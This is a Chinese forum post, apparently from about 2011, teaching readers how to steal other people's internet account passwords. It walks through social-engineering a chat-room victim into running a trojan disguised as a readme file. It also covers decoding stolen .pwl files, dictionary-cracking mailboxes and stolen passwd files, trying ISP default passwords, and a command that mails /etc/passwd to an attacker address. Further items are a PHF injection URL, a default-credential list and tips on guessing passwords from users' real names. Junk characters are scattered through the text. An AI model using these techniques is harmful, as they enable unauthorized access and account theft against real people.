找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
/ v" `; h" c7 F9 v5 H. \- L1 E方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
1 O" r1 D' h* u9 q: u5 [优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
1 l; e& _* i! O, R9 s* G缺点:只有一个,那就是如何让对方乖乖的运行你的程序。) h" o. Z  C) E- ?# Q: h
提示:先问清你的目标和你是不是在一个城市。
# O: s. u  ?- o8 A2 Y0 a实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
; t# y  S8 O6 N/ O* V& U/ T哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
+ e; N9 T: H2 K! ~2 i5 E3 E7 a忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。1 P( G: ]4 N5 m- K
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
+ j2 \( \, T7 Z3 A优点:没什么优点. `* t- o  P8 e5 v0 {
缺点:要具体情况具体对待,太麻烦3 U! {3 ~! K8 ^7 s. A
提示:平时多多留神。! }* ?& M+ S" v8 Q
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
! W- K" G) t0 U密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。9 M' }+ C# w2 e% a$ x
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
9 K/ C) _7 l; o  M6 F3 V方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
8 M) a: O& {# b' \8 v$ i+ p7 N优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。, P1 D2 x' _* O" I& G% n3 K  ^
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
9 Z9 O& S+ u7 z7 {  Q" I, l由于介绍此类的教学文章比较多,我就不班门弄斧了。
6 |5 u7 v% ~/ `& g# l6 G; f2 D5 l1 g4 h! b# ~( h
哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
: K3 D3 i4 l5 N  n$ F0 u4 i只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
# d2 U" P1 u9 s2 N6 [有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
% |. M5 h) L. k- X$ N2 j& T" `3 r( u0 S, |
------------------------------
7 ?1 q. r7 {8 R/ k& t% }) q" R) u! _3 v: O
XXX,你好(XX是你在表格上填的名字)$ u% i  B/ H3 _7 D
你在XX热线的主页空间已开通( U  Y# N/ t$ V( e
帐户名:XXX 密码:11) ]$ l* L/ X8 X8 T4 j
-----------XX热线9 P( ]* `  j, A$ J8 K  g* q1 O2 b3 j
电话:XXXX-XXXXXXXX  t7 x8 j& I; f2 \$ ~1 ]. y
------------------------------
4 I; ?2 _, o6 r7 g7 l4 L( _2 i# t4 ^0 z* D3 `
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
! C5 q5 R$ ?7 I! H( p( A开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
0 M% q) E: y3 M/ p上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!/ n/ L  D+ L* w' f; A: B
  
3 P7 c5 u% y" `$ ]
  A4 R: ?) i" T* T2 n0 {1 z& {                           如何获得第一个帐号; g& j# Z9 X& ?* h. n
. B5 i( g6 L$ n
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
" U# q3 `- p. r# U0 }; e7 g: j! T1 F$ d4 [, d4 r$ r% Y
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
8 X2 V+ y+ M. W, I
& }. H5 L- X& Y% \, r如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
* G' c* I% }+ n; U3 e, q
! |" u% J7 ], Y; `& W5 @7 m' A以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
7 r5 a' p# q  E) y+ K9 O' G. H  ^4 E2 a0 I1 Q" T- a3 d3 z
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!; W" M9 G$ k/ ?2 d0 `
( {. J8 d7 g. e/ N7 _4 K
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
3 B. T8 D1 ]7 n) J$ r0 K7 u  s; P  x: W' U
帐号     密码
+ |2 e' b8 y, D& }4 ~----------- ----------------
3 _, `# s' V# xroot    root
3 J% q* `- |: q, w$ Rsys     sys/system/bin
7 k3 m. v& R% c  G7 q) Mbin     sys/bin  s/ \# Q6 W2 k, q
mountfsys  mountfsys
# A* u- M. _" h% nadm     adm6 k( \7 P+ k( ]1 T% T1 f
uucp    uucp
/ Q) R$ v4 _4 ynuucp    anon5 Y' }/ a4 j( I: ]
anon    anon+ V: S3 Z$ L6 x3 m
user    user
# ^7 \! V+ m( e8 H# Q" Ygames    games
3 U  B" x, W1 ?) W' ^+ e4 Ginstall   install6 s$ _  Z* Q2 a- a+ Y) {2 O! o
reboot   给 "command login" 用的
0 I) L: M9 ]1 ~8 g5 W5 Edemo    demo
  s! N0 J6 c2 R3 s. Uumountfsys umountfsys
. S5 T* S. {$ r4 A) e2 [. G, `. Fsync     sync4 J: L1 q% F6 Z# f8 v
admin    admin
5 M. t2 `  Y5 X! a0 X" n- h; P9 Cguest    guest& y  M# Z" U: U$ H, b4 ^2 M" J
daemon   daemon) |. o5 c1 P3 K2 ]& \5 q; v
________________________________________________________________
4 J3 e' _& w; Y8 A' }" V1 C$ T4 @0 B/ m1 k, E" e* P6 l
有些管理员忘记把他们改掉,那你就发财了!2 v/ c6 C& O  U( O! o" x  O
3 T# q0 |" S- O& N
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.0 B1 g5 z/ U1 N# g
" K4 U% L0 w2 B; }" d
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
: D- ~+ {) w2 y! a- g: \. U9 [- O8 \
.........
! N8 v8 g( i6 x, W" _" i
: D% o8 n0 W# Y6 o* w1 jxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh+ T9 K5 V: V* u8 [! ~+ P0 b8 q+ l

5 c. P+ {9 i8 n) V' Uqingyuan:x:275:50::/usr/qingyuan:/bin/sh
1 M  h6 @# L2 T# i2 f( h: }9 L
; b& }* A7 P! v7 L* {8 ]7 Mhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh: T6 U4 n1 H3 L- ^& ~6 B* Z

) v; Z' q1 t7 U  h" i( t, q& hsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh! c" o' a* \$ p7 X/ Z/ f; E, o

1 S# j. B6 C  _9 g. dkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh& s1 O! Y. d! c* s% D6 Q

/ M2 o$ C/ E. M" dbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
: z' j0 S: v! T+ d  V( V  ?9 s8 ?8 _! O, w* _+ I' ~/ b
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh( R/ a0 S/ N  u, ^2 f  Y( D% y$ D" I
! [+ @, j# k# }4 ~( L4 L5 Q4 m
............& n: m& B( s) u
. d) y6 {: f* C0 Z
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的." F% ]: h' {% S2 k% p( s

- j6 r- I( v5 r  D6 v如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
& B' i; L/ J+ I; v9 t% f3 i6 q; Y& g+ W$ f& t( v: ]
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
% u- Z& J$ L! q# s0 _+ ^8 c+ K: g! }% k$ m- J
如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.! Z% q8 x7 q/ Q: }
+ p3 k0 I+ N2 O, q4 h
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.7 e" {: i7 Y' F' j& ^

' ^8 P! t: \, b1 A, p8 f' h( `2 c7 B你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
. M9 C4 k6 V% Y$ u/ M0 Q
+ ?$ N9 q: |$ B9 l- R4 d' T
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-8-2 14:28

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表